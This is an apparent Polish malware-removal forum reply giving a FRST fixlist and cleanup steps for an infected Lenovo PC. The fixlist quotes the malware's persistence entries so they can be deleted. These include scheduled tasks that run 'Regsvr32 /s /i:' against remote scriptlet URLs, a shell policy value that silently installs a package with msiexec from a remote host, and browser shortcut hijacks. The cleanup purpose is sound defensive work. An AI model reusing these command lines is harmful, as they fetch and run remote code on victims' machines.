Otwórz notatnik systemowy i wklej: HKU\S-1-5-21-1444785495-1987985108-1581221449-1001\...\ChromeHTML: -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) <==== UWAGA Task: {2C37486B-D5AE-4697-9EA6-90209084B474} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8yMUYxRjIyNTE8NdJXOTlQNjRWMjE4Fjk1NWZYM8Y4Nq== scrobj.dll Task: {D308F661-0370-4E51-B553-D4CCE6C3EF85} - \WPD\SqmUpload_S-1-5-21-1444785495-1987985108-1581221449-1001 -> Brak pliku <==== UWAGA Task: {F011CB3B-AB3E-4529-BC45-AE4CD626BD58} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8yMUYxRjIyNTE8NdJXOTlQNjRWMjE4Fjk1NWZYM8Y4Nq== scrobj.dll ShortcutWithArgument: C:\Users\Lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGGjMhx0cXWEzorAHwnIBucmHTnIcBRt1OYWrRZaPgMj3Vd2WLuBdf9SwjDA8jBc%3D ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGGjMhx0cXWEzorAHwnIBucmHTnIcBRt1OYWrRZaPgMj3Vd2WLuBdf9SwjDA8jBc%3D FirewallRules: [{9BE4A1FF-5706-439D-99A2-C4B438154530}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS612C\HP.EasyStart.exe FirewallRules: [{688AEDCC-2892-4D16-9E50-003014C97852}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS775B\HP.EasyStart.exe FirewallRules: [{8E2693FC-8F36-423A-BBEA-9593307F3000}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS7948\HP.EasyStart.exe FirewallRules: [{EAFFC7B4-53EE-4B4D-B5D3-BD510E61B9EC}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS7B69\HP.EasyStart.exe FirewallRules: [{BF0E3331-CAAA-4B94-8BE2-9F312A792774}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS04F1\HP.EasyStart.exe FirewallRules: [{D55B62E5-1611-462F-9F9D-22C6B9774969}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS067C\HP.EasyStart.exe FirewallRules: [{B8BF7321-5BD5-4DB8-BC88-8EB26C2D8144}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS434B\HP.EasyStart.exe FirewallRules: [{5FC96519-8B9A-4E31-88D4-7DF007BE98A2}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS4651\HP.EasyStart.exe FirewallRules: [{5EAABB5B-DA32-4E65-BF81-09112376AD39}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS4D90\HP.EasyStart.exe FirewallRules: [{E26E884B-B25B-469C-90A8-308D16996190}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS5EF6\HP.EasyStart.exe FirewallRules: [{59C5672A-D6E4-4673-945D-CD0466918EE7}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS6067\HP.EasyStart.exe FirewallRules: [{43DC7E34-A757-4566-B898-95BB0EB4EDE0}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS631F\HP.EasyStart.exe FirewallRules: [{1AA7DB99-9D89-42EF-8367-91A283511E2A}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS64BD\HP.EasyStart.exe FirewallRules: [{72AEB0EE-DC9A-4255-80FE-2B3CC278DA63}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS68F9\HP.EasyStart.exe FirewallRules: [{B8076A66-F005-493D-9AA3-32688C9A4224}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS6EF2\HP.EasyStart.exe FirewallRules: [{58B94CDB-100D-4ACF-A8F6-6D8EEE85DEE3}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS0245\HP.EasyStart.exe FirewallRules: [{8AFEFAD3-F196-482E-ABB0-866D8BA23EBF}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS1424\HP.EasyStart.exe FirewallRules: [{96691501-C41F-40A7-90E1-F9EA7473231B}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS24CA\HP.EasyStart.exe FirewallRules: [{95EA4C12-660D-4EEA-B43D-CBF73401639B}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS2A50\HP.EasyStart.exe FirewallRules: [{058991B6-773D-4BD0-9AB3-A263D8A0E29D}] => (Allow) C:\Users\Lenovo\AppData\Local\Temp\7zS5349\HP.EasyStart.exe HKU\S-1-5-21-1444785495-1987985108-1581221449-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yMUYxRjIyNTE8NdJXOTlQNjRWMjE4Fjk1NWZYM8Y4Nq== /q HKU\S-1-5-21-1444785495-1987985108-1581221449-1001\...\MountPoints2: {c7b83de8-2428-11e7-82b6-b46d8361da81} - "H:\LGAutoRun.exe" IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Lenovo\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Lenovo\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Lenovo\AppData\Local\MEGAsync\ShellExtX64.dll -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Lenovo\AppData\Local\MEGAsync\ShellExtX32.dll -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Lenovo\AppData\Local\MEGAsync\ShellExtX32.dll -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Lenovo\AppData\Local\MEGAsync\ShellExtX32.dll -> Brak pliku HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA FF SearchPlugin: C:\Users\Lenovo\AppData\Roaming\Firefox\Firefox\Profiles\b4jole7u.default\searchplugins\startsearch.xml [2017-04-20] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx HKU\S-1-5-21-1444785495-1987985108-1581221449-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) <==== UWAGA R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S3 dbx; system32\DRIVERS\dbx.sys [X] U4 npcap_wifi; Brak ImagePath EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan(Skanuj) i później Cleaning(Oczyść).